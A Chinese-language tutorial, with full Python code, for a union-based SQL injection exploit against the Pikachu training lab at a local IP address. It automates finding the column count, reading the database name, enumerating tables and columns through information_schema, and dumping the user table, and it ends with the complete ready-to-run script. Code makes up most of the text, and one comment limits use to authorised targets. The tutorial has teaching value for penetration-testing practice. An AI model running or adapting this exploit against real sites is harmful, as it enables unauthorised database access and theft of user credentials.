exp编写
这里以基于联合注入的exp为例子
1. 全局变量
定义存放结果的全局变量、初始 payload 以及自定义的 HTTP 请求头(后续每个函数都会读写这些全局变量)。
# Target and shared state for the union-based injection exploit below.
# NOTE: this points at a local Pikachu training instance; only run the exploit
# against systems you are authorised to test.
url: str = "http://192.168.110.131/pikachu-master/vul/sqli/sqli_str.php" # URL of the injection point to test
payload: str = "' union select 1" # initial payload; column() extends it with ",2", ",3", ... and stores the working one here
db: str = "" # current database name, filled in by database_name()
tb: list[str] = [] # table names of that database, filled in by table_name()
cb: list[str] = [] # column names of the user table, filled in by column_user()
user: list[list[str]] = [] # dumped user-table contents, one list of values per column, filled in by user_table()
head: dict[str, str] = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "} # custom HTTP headers sent with every request
2.猜字段数
循环增加 UNION SELECT 中的字段数量并发包,对返回包做正则匹配:只要响应中不再出现 MySQL 的 "different number of columns" 报错,就认为找到了字段数。注意这种判断依赖目标把数据库报错回显到页面上(Pikachu 正是如此);若目标关闭了报错回显,每个响应都会被当作成功,此时应改用 order by 或根据页面内容差异来判断。
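def column(column_num="", max_columns=32, send=None):
    """Detect the column count of the injected UNION SELECT and store the working payload.

    Starting from ``column_num`` (e.g. ``"' union select 1"``) the payload is sent as-is
    and then with one more column appended per request (``,2``, ``,3``, ...) until the
    response no longer contains MySQL's "different number of columns" error. The first
    payload that passes is written to the global ``payload`` for the later stages.

    Args:
        column_num: base UNION payload that already selects one column. Empty -> no-op.
        max_columns: highest column count to try before giving up.
        send: optional ``send(params) -> response body text`` replacing ``requests.get``
            (useful for tests or another transport); ``params`` is the GET query dict.

    Returns:
        The detected column count, or ``None`` when nothing passed within ``max_columns``
        (``payload`` is then left untouched).

    Caveat: the check only looks for the MySQL error text, so it assumes the target
    echoes database errors into the page (Pikachu does). With error display disabled
    every response looks like a success and the first candidate would be accepted;
    use ``order by`` or a content-based comparison on such targets.
    """
    global payload
    if not column_num:
        return None
    fetch = send
    if fetch is None:
        def fetch(params):
            return requests.get(url=url, headers=head, params=params).text
    error = "The used SELECT statements have a different number of columns"
    candidate = column_num
    for count in range(1, max_columns + 1):
        if count > 1:
            candidate += "," + str(count)  # e.g. "' union select 1,2,3"
        body = fetch({"name": candidate + "#", "submit": "查询"})
        if error in body:
            continue
        print("字段数:", count)
        print("payload:" + candidate + "#")
        payload = candidate
        return count
    return None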
3.查询当前数据库名字
通过查询database(),得到数据库名
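def database_name(payload_database="", send=None):
    """Query ``database()`` through the UNION payload and store the result in the global ``db``.

    The first selected column of ``payload_database`` (the literal ``1``) is swapped for
    ``database()``; the name is then pulled out of the page with the Pikachu result
    pattern ``<p class='notice'>your uid:... <br />``.

    Args:
        payload_database: working UNION payload from column(), e.g. ``"' union select 1,2"``.
        send: optional ``send(params) -> response body text`` replacing ``requests.get``.

    Returns:
        The database name (also stored in ``db``).

    Raises:
        ValueError: if the result pattern is not found in the response (the original
        code failed here with a bare IndexError).
    """
    global db
    fetch = send
    if fetch is None:
        def fetch(params):
            return requests.get(url=url, headers=head, params=params).text
    injected = payload_database.replace("1", "database()", 1)  # only the first column
    body = fetch({"name": injected + "#", "submit": "查询"})
    found = re.findall("<p class='notice'>your uid:(.+?) <br />", body)
    if not found:
        raise ValueError("database name not found in the response; check the payload "
                         "and the result pattern for this target")
    db = found[0]
    print("数据库:" + db)
    print("payload:" + injected + "#")
    return db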
4. 查询表名
通过mysql的information_schema表来获得数据库里所有的表名。
在 MySQL 中,可以把 information_schema 看作一个数据库,确切地说是信息数据库,其中保存着 MySQL 服务器所维护的所有其他数据库的元信息,如数据库名、数据库中的表、表中各列的数据类型与访问权限等。information_schema 中的表都是只读的,它们实际上是视图而不是基本表,因此在磁盘上看不到与之对应的数据文件。关于 information_schema 的更多信息可参考 https://wenku.baidu.com/view/f00d66346ddb6f1aff00bed5b9f3f90f76c64d34.html
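def table_name(payload_table="", schema=None, send=None):
    """List the tables of a database via information_schema and store them in the global ``tb``.

    The first selected column is replaced with ``table_name`` and a
    ``from information_schema.tables where table_schema='<schema>'`` clause is appended;
    every row Pikachu prints (``your uid:...``) becomes one entry of the result.

    Args:
        payload_table: working UNION payload from column(), e.g. ``"' union select 1,2"``.
        schema: database to enumerate; defaults to the global ``db`` set by database_name().
        send: optional ``send(params) -> response body text`` replacing ``requests.get``.

    Returns:
        The table names found (possibly empty), in page order; also stored in ``tb``.
    """
    global tb
    if schema is None:
        schema = db
    fetch = send
    if fetch is None:
        def fetch(params):
            return requests.get(url=url, headers=head, params=params).text
    # Replace only the first "1" so multi-digit column numbers (10, 11, ...) survive.
    injected = (payload_table.replace("1", "table_name", 1)
                + " from information_schema.tables where table_schema='" + schema + "'")
    body = fetch({"name": injected + "#", "submit": "查询"})
    tables = re.findall("<p class='notice'>your uid:(.+?) <br />", body)
    print(schema, "下的所有表名:", tables)
    tb = tables
    print("payload:" + injected + "#")
    return tables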
5.查询user表的列名
这里只以 user 表为示例,对代码稍作修改就可以查询更多的表。注意代码中用 tb[3] 固定取第 4 个表名,这依赖于上一步返回的表名顺序;换用其他目标时务必先核对打印出来的表名列表。
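def column_user(payload_user="", table=None, schema=None, send=None):
    """List the columns of one table via information_schema and store them in the global ``cb``.

    Args:
        payload_user: working UNION payload from column(), e.g. ``"' union select 1,2"``.
        table: table to enumerate. Defaults to ``tb[3]``, the fourth table returned by
            table_name() (the user table in this lab); that index depends on the
            target's table order, so verify it against the printed table list.
        schema: database the table lives in; defaults to the global ``db``.
        send: optional ``send(params) -> response body text`` replacing ``requests.get``.

    Returns:
        The column names found (possibly empty); also stored in ``cb``.

    Raises:
        IndexError: if ``table`` is not given and ``tb`` holds fewer than four names.
    """
    global cb
    if table is None:
        if len(tb) < 4:
            raise IndexError("tb has fewer than 4 tables; run table_name() first or pass table=")
        table = tb[3]
    if schema is None:
        schema = db
    fetch = send
    if fetch is None:
        def fetch(params):
            return requests.get(url=url, headers=head, params=params).text
    # Replace only the first "1" so multi-digit column numbers survive.
    injected = (payload_user.replace("1", "column_name", 1)
                + " from information_schema.columns where table_schema='" + schema
                + "' and table_name='" + table + "'")
    body = fetch({"name": injected + "#", "submit": "查询"})
    columns = re.findall("<p class='notice'>your uid:(.+?) <br />", body)
    print(table + "表下的所有列:\n", columns)
    cb = columns
    return columns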
6.查询user表的内容
根据上一步得到的表名和列名,逐列发包查询 user 表的全部内容(每列一个请求,结果按列顺序存入全局变量 user)。
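def user_table(payload_usertable="", table=None, columns=None, send=None):
    """Dump every column of a table, one request per column, into the global ``user``.

    For each column name the first selected column of the payload is replaced with that
    name and ``from <table>`` is appended; all rows Pikachu prints for it are collected
    as one list, so ``user[i]`` holds the values of ``columns[i]``.

    Args:
        payload_usertable: working UNION payload from column(), e.g. ``"' union select 1,2"``.
        table: table to dump; defaults to ``tb[3]`` (see column_user()).
        columns: column names to fetch; defaults to the global ``cb`` from column_user().
        send: optional ``send(params) -> response body text`` replacing ``requests.get``.

    Returns:
        A list with one list of values per column; also assigned to ``user`` (replacing,
        not appending to, any previous dump so the indices stay aligned with ``cb``).

    Raises:
        IndexError: if ``table`` is not given and ``tb`` holds fewer than four names.
    """
    global user
    if table is None:
        if len(tb) < 4:
            raise IndexError("tb has fewer than 4 tables; run table_name() first or pass table=")
        table = tb[3]
    if columns is None:
        columns = cb
    fetch = send
    if fetch is None:
        def fetch(params):
            return requests.get(url=url, headers=head, params=params).text
    pattern = re.compile("<p class='notice'>your uid:(.+?) <br />")
    rows = []
    for name in columns:
        # Swap only the first "1" for the column name, then point the UNION at the table.
        injected = payload_usertable.replace("1", name, 1) + " from " + table
        body = fetch({"name": injected + "#", "submit": "查询"})
        rows.append(pattern.findall(body))
    user = rows
    return rows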
7.输出查询到的user表内容
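if __name__ == '__main__':
    # Run the stages in dependency order: each one reads the globals the previous one
    # filled in (payload -> db -> tb -> cb -> user).
    column(payload)
    database_name(payload)
    table_name(payload)
    column_user(payload)
    user_table(payload)
    # Print each column name next to the values dumped for it.
    for name, values in zip(cb, user):
        print(name, ":", values)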
8.完整exp
import re
import requests
# Target and shared state for the union-based injection exploit below.
# NOTE: this points at a local Pikachu training instance; only run the exploit
# against systems you are authorised to test.
url: str = "http://192.168.110.131/pikachu-master/vul/sqli/sqli_str.php" # URL of the injection point to test
payload: str = "' union select 1" # initial payload; column() extends it with ",2", ",3", ... and stores the working one here
db: str = "" # current database name, filled in by database_name()
tb: list[str] = [] # table names of that database, filled in by table_name()
cb: list[str] = [] # column names of the user table, filled in by column_user()
user: list[list[str]] = [] # dumped user-table contents, one list of values per column, filled in by user_table()
head: dict[str, str] = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "} # custom HTTP headers sent with every request
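def column(column_num="", max_columns=32, send=None):
    """Detect the column count of the injected UNION SELECT and store the working payload.

    Starting from ``column_num`` (e.g. ``"' union select 1"``) the payload is sent as-is
    and then with one more column appended per request (``,2``, ``,3``, ...) until the
    response no longer contains MySQL's "different number of columns" error. The first
    payload that passes is written to the global ``payload`` for the later stages.

    Args:
        column_num: base UNION payload that already selects one column. Empty -> no-op.
        max_columns: highest column count to try before giving up.
        send: optional ``send(params) -> response body text`` replacing ``requests.get``
            (useful for tests or another transport); ``params`` is the GET query dict.

    Returns:
        The detected column count, or ``None`` when nothing passed within ``max_columns``
        (``payload`` is then left untouched).

    Caveat: the check only looks for the MySQL error text, so it assumes the target
    echoes database errors into the page (Pikachu does). With error display disabled
    every response looks like a success and the first candidate would be accepted;
    use ``order by`` or a content-based comparison on such targets.
    """
    global payload
    if not column_num:
        return None
    fetch = send
    if fetch is None:
        def fetch(params):
            return requests.get(url=url, headers=head, params=params).text
    error = "The used SELECT statements have a different number of columns"
    candidate = column_num
    for count in range(1, max_columns + 1):
        if count > 1:
            candidate += "," + str(count)  # e.g. "' union select 1,2,3"
        body = fetch({"name": candidate + "#", "submit": "查询"})
        if error in body:
            continue
        payload = candidate
        return count
    return None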
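def database_name(payload_database="", send=None):
    """Query ``database()`` through the UNION payload and store the result in the global ``db``.

    The first selected column of ``payload_database`` (the literal ``1``) is swapped for
    ``database()``; the name is then pulled out of the page with the Pikachu result
    pattern ``<p class='notice'>your uid:... <br />``.

    Args:
        payload_database: working UNION payload from column(), e.g. ``"' union select 1,2"``.
        send: optional ``send(params) -> response body text`` replacing ``requests.get``.

    Returns:
        The database name (also stored in ``db``).

    Raises:
        ValueError: if the result pattern is not found in the response (the original
        code failed here with a bare IndexError).
    """
    global db
    fetch = send
    if fetch is None:
        def fetch(params):
            return requests.get(url=url, headers=head, params=params).text
    injected = payload_database.replace("1", "database()", 1)  # only the first column
    body = fetch({"name": injected + "#", "submit": "查询"})
    found = re.findall("<p class='notice'>your uid:(.+?) <br />", body)
    if not found:
        raise ValueError("database name not found in the response; check the payload "
                         "and the result pattern for this target")
    db = found[0]
    return db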
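def table_name(payload_table="", schema=None, send=None):
    """List the tables of a database via information_schema and store them in the global ``tb``.

    The first selected column is replaced with ``table_name`` and a
    ``from information_schema.tables where table_schema='<schema>'`` clause is appended;
    every row Pikachu prints (``your uid:...``) becomes one entry of the result.

    Args:
        payload_table: working UNION payload from column(), e.g. ``"' union select 1,2"``.
        schema: database to enumerate; defaults to the global ``db`` set by database_name().
        send: optional ``send(params) -> response body text`` replacing ``requests.get``.

    Returns:
        The table names found (possibly empty), in page order; also stored in ``tb``.
    """
    global tb
    if schema is None:
        schema = db
    fetch = send
    if fetch is None:
        def fetch(params):
            return requests.get(url=url, headers=head, params=params).text
    # Replace only the first "1" so multi-digit column numbers (10, 11, ...) survive.
    injected = (payload_table.replace("1", "table_name", 1)
                + " from information_schema.tables where table_schema='" + schema + "'")
    body = fetch({"name": injected + "#", "submit": "查询"})
    tables = re.findall("<p class='notice'>your uid:(.+?) <br />", body)
    tb = tables
    return tables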
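def column_user(payload_user="", table=None, schema=None, send=None):
    """List the columns of one table via information_schema and store them in the global ``cb``.

    Args:
        payload_user: working UNION payload from column(), e.g. ``"' union select 1,2"``.
        table: table to enumerate. Defaults to ``tb[3]``, the fourth table returned by
            table_name() (the user table in this lab); that index depends on the
            target's table order, so verify it against the table list.
        schema: database the table lives in; defaults to the global ``db``.
        send: optional ``send(params) -> response body text`` replacing ``requests.get``.

    Returns:
        The column names found (possibly empty); also stored in ``cb``.

    Raises:
        IndexError: if ``table`` is not given and ``tb`` holds fewer than four names.
    """
    global cb
    if table is None:
        if len(tb) < 4:
            raise IndexError("tb has fewer than 4 tables; run table_name() first or pass table=")
        table = tb[3]
    if schema is None:
        schema = db
    fetch = send
    if fetch is None:
        def fetch(params):
            return requests.get(url=url, headers=head, params=params).text
    # Replace only the first "1" so multi-digit column numbers survive.
    injected = (payload_user.replace("1", "column_name", 1)
                + " from information_schema.columns where table_schema='" + schema
                + "' and table_name='" + table + "'")
    body = fetch({"name": injected + "#", "submit": "查询"})
    columns = re.findall("<p class='notice'>your uid:(.+?) <br />", body)
    cb = columns
    return columns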
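def user_table(payload_usertable="", table=None, columns=None, send=None):
    """Dump every column of a table, one request per column, into the global ``user``.

    For each column name the first selected column of the payload is replaced with that
    name and ``from <table>`` is appended; all rows Pikachu prints for it are collected
    as one list, so ``user[i]`` holds the values of ``columns[i]``.

    Args:
        payload_usertable: working UNION payload from column(), e.g. ``"' union select 1,2"``.
        table: table to dump; defaults to ``tb[3]`` (see column_user()).
        columns: column names to fetch; defaults to the global ``cb`` from column_user().
        send: optional ``send(params) -> response body text`` replacing ``requests.get``.

    Returns:
        A list with one list of values per column; also assigned to ``user`` (replacing,
        not appending to, any previous dump so the indices stay aligned with ``cb``).

    Raises:
        IndexError: if ``table`` is not given and ``tb`` holds fewer than four names.
    """
    global user
    if table is None:
        if len(tb) < 4:
            raise IndexError("tb has fewer than 4 tables; run table_name() first or pass table=")
        table = tb[3]
    if columns is None:
        columns = cb
    fetch = send
    if fetch is None:
        def fetch(params):
            return requests.get(url=url, headers=head, params=params).text
    pattern = re.compile("<p class='notice'>your uid:(.+?) <br />")
    rows = []
    for name in columns:
        # Swap only the first "1" for the column name, then point the UNION at the table.
        injected = payload_usertable.replace("1", name, 1) + " from " + table
        body = fetch({"name": injected + "#", "submit": "查询"})
        rows.append(pattern.findall(body))
    user = rows
    return rows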
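if __name__ == '__main__':
    # Run the stages in dependency order: each one reads the globals the previous one
    # filled in (payload -> db -> tb -> cb -> user).
    column(payload)
    database_name(payload)
    table_name(payload)
    column_user(payload)
    user_table(payload)
    # Print each column name next to the values dumped for it.
    for name, values in zip(cb, user):
        print(name, ":", values)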